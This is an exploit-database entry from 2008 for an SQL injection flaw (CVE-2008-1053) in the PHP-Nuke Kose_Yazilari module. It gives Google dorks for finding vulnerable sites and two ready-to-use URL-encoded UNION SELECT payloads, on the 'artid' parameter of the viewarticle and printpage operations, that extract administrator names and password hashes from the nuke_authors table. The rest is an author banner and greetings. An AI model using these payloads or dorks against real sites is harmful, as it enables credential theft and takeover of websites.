PHP-Nuke Module Kose_Yazilari - 'artid' SQL Injection



EKU-ID: 13133 CVE: OSVDB-42413;CVE-2008-1053 OSVDB-ID:
Author: xcorpitx Published: 2008-02-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


  ##     ##
   ##   ##
    ## ##
     ###CoRPITX
     ###
    ## ##
   ##   ##
  ##     ##

########################### Turkey ####################################
#                                                                     #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#
#  PHP-Nuke (Kose_Yazilari) SQL Injection Vulnerability
#
#######################################################################
#
#  AUTHOR : xcorpitx
#
#  HOME   : www.Hayalet-hack.com / www.zone-turk.net
#
########################################################################
# WHEN YOU PUT THIS SQL CODE YOU can SEE ADMýN NAME,ADMIN HASH
########################################################################
#
#  DorK  1 : ''name Kose_Yazilari op viewarticle artid''
#  Dork  2 : ''name Kose_Yazilari op printpage artid''
########################################################################
#
#  EXPLOIT:
#
########################################################################
#
#
modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
#
#
#
modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
#
########################################################################

Thank my friends : pc faresi, hayalet,D3ng3s!z,SmoKin,apex,mostbiq

# milw0rm.com [2008-02-25]